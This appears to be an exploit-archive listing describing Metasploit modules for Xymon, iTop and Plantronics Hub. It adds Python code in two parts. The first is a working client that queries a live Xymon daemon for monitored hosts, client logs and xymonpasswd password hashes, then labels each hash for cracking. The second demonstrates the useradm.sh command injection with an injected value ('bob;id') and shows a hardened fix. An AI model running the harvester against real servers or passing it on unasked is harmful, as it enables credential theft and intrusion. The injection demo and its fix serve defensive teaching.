This Metasploit module retrieves information from a Xymon daemon service (formerly Hobbit, based on Big Brother), including server configuration information, a list of monitored hosts, and the associated client log for each host. The module also retrieves usernames and password hashes from the xymonpasswd config file on Xymon servers prior to 4.3.25, which permit downloading arbitrary config files (CVE-2016-2055), and on servers configured with ALLOWALLCONFIGFILES enabled.
9ee70b9bf9b8edb046baafd8f5faf4f4a2796e5fb36f7a5b908641436a2306ab
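The retrieval described above uses the plain-text xymond protocol: one request per TCP connection to port 1984, with the reply read after the client half-closes. The following is an added example written for this listing, not code from the Metasploit module or the Xymon project. It assumes the messages the module is known to send ("hostinfo", "config xymonpasswd", "clientlog HOST"), assumes the "hostinfo" reply lists one host per line with "|"-separated fields and the hostname first, and includes constructed sample replies so the parsers run offline; the htpasswd hash classification helps pick a cracking mode for what comes back.

```python
import socket
from typing import List, Tuple

XYMOND_PORT = 1984  # default TCP port of the xymond listener

# Constructed sample of a "config xymonpasswd" reply (htpasswd format); not real credentials.
SAMPLE_XYMONPASSWD = """\
# xymon web users
xymon:$apr1$Qm2kX9Zs$AbCdEfGhIjKlMnOpQrStU0
admin:{SHA}qUqP5cyxm6YcTAhz05Hph5gvu9M=
guest:Kh7FmQ3n8dP2A
"""

# Constructed sample of a "hostinfo" reply: one host per line, "|"-separated fields,
# hostname first (field layout is an assumption, not something this page states).
SAMPLE_HOSTINFO = """\
xymon.example.test|10.0.0.5|...|
web01.example.test|10.0.0.10|...|
"""


def xymon_query(host: str, message: str, port: int = XYMOND_PORT, timeout: float = 10.0) -> str:
    """Send one message to xymond and return the raw reply.

    xymond reads the request until the client half-closes the connection,
    so the sending side is shut down before the reply is read.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(message.encode() + b"\n")
        sock.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = sock.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def parse_hostinfo(reply: str) -> List[str]:
    """Extract hostnames from a 'hostinfo' reply (first field of each non-comment line)."""
    hosts = []
    for line in reply.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            hosts.append(line.split("|", 1)[0])
    return hosts


def classify_hash(h: str) -> str:
    """Name the htpasswd hash scheme so the right cracking mode can be chosen."""
    if h.startswith("$apr1$"):
        return "apr1-md5"
    if h.startswith("{SHA}"):
        return "sha1"
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    return "crypt"


def parse_xymonpasswd(reply: str) -> List[Tuple[str, str, str]]:
    """Parse a 'config xymonpasswd' reply into (user, hash, scheme) tuples."""
    creds = []
    for line in reply.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, h = line.split(":", 1)
        creds.append((user, h, classify_hash(h)))
    return creds


def collect(host: str) -> dict:
    """Live walk of a target: monitored hosts, web credentials, and each host's client log."""
    hosts = parse_hostinfo(xymon_query(host, "hostinfo"))
    creds = parse_xymonpasswd(xymon_query(host, "config xymonpasswd"))
    logs = {h: xymon_query(host, f"clientlog {h}") for h in hosts}
    return {"hosts": hosts, "creds": creds, "clientlogs": logs}


if __name__ == "__main__":
    # Offline run on the constructed samples; call collect("<target>") against a live xymond.
    for user, h, scheme in parse_xymonpasswd(SAMPLE_XYMONPASSWD):
        print(f"{user}: {scheme} {h}")
    print(parse_hostinfo(SAMPLE_HOSTINFO))
```

A patched server (4.3.25 or later without ALLOWALLCONFIGFILES) answers "config xymonpasswd" with an empty or refused reply rather than file contents, so an empty result from parse_xymonpasswd is the expected negative case, not a parser failure.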
iTop versions prior to 2.7.5 authenticated remote command execution exploit.
a0b99a6ffb1e72f424f072c032f45fd3c9811762bc3e6fd6ab9132aafab59e6c
The Plantronics Hub client application for Windows makes use of an automatic update service, SpokesUpdateService.exe, which automatically executes a file specified in the MajorUpgrade.config configuration file as SYSTEM. The configuration file is writable by all users by default. This Metasploit module has been tested successfully on Plantronics Hub version 3.13.2 on Windows 7 SP1 (x64).
158f8bba58dd0cfb1693ccc6021434881f579c25482bb12c46542cc4b0abb810
Plantronics Hub version 3.13.2 suffers from a local privilege escalation vulnerability.
339cf6961e3d99bb3313daad76cb69c0c28d3894b10b7c2c36bed47bb3a1e73c
This Metasploit module exploits a command injection vulnerability in Xymon versions before 4.3.25 which allows authenticated users to execute arbitrary operating system commands as the web server user. When adding a new user to the system via the web interface with useradm.sh, the user's username and password are passed to htpasswd in a call to system() without validation. This module has been tested successfully on Xymon version 4.3.10 on Debian 6.
56921faf23d84d68f64c70045561cd00f989f797c3579b3de87eae4139a3e53c
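The useradm.sh flaw described above is the classic shape of a command injection: user-controlled fields concatenated into a command string and handed to system(). The following is an added example for this listing, not Xymon's code or the Metasploit module; it assumes a htpasswd file path of /etc/xymon/xymonpasswd for illustration. It shows the unsafe command construction, a shell-style tokeniser that makes an injected second command visible, and the hardened form that validates the username and passes each value as its own argv element so no shell ever parses the input.

```python
import re
import shlex
from typing import List

XYMONPASSWD = "/etc/xymon/xymonpasswd"  # assumed path, for illustration only


def vulnerable_command(username: str, password: str) -> str:
    """The unsafe pattern: the command line is built by concatenation and would be
    passed to system(), so shell metacharacters in either field are interpreted."""
    return f"htpasswd -b {XYMONPASSWD} {username} {password}"


def shell_segments(cmdline: str) -> List[List[str]]:
    """Tokenise a command line the way a POSIX shell would and split it at command
    separators, so an injected command shows up as an extra segment."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    segments, current = [], []
    for tok in lex:
        if tok in (";", "&&", "||", "|", "&"):
            segments.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        segments.append(current)
    return segments


# Allow-list for usernames; anything outside it is rejected rather than escaped.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def safe_argv(username: str, password: str) -> List[str]:
    """Hardened form: validate the username and build an argv list to run with
    subprocess.run(argv) (no shell=True), so the shell never sees user input."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains disallowed characters")
    # htpasswd stores "user:hash" lines; NUL, newlines and ':' cannot be represented.
    if any(c in password for c in "\0\r\n:"):
        raise ValueError("password contains characters htpasswd cannot store")
    return ["htpasswd", "-b", XYMONPASSWD, username, password]


if __name__ == "__main__":
    injected = vulnerable_command("bob;id", "pw")
    print(injected)
    print(shell_segments(injected))   # second segment is the attacker's command
    print(safe_argv("bob", "pw"))
    try:
        safe_argv("bob;id", "pw")
    except ValueError as e:
        print("rejected:", e)
```

Even the argv form still exposes the password in the process list because htpasswd -b takes it on the command line; Apache 2.4 builds of htpasswd accept -i to read the password from stdin instead, which is the better choice for a web front end.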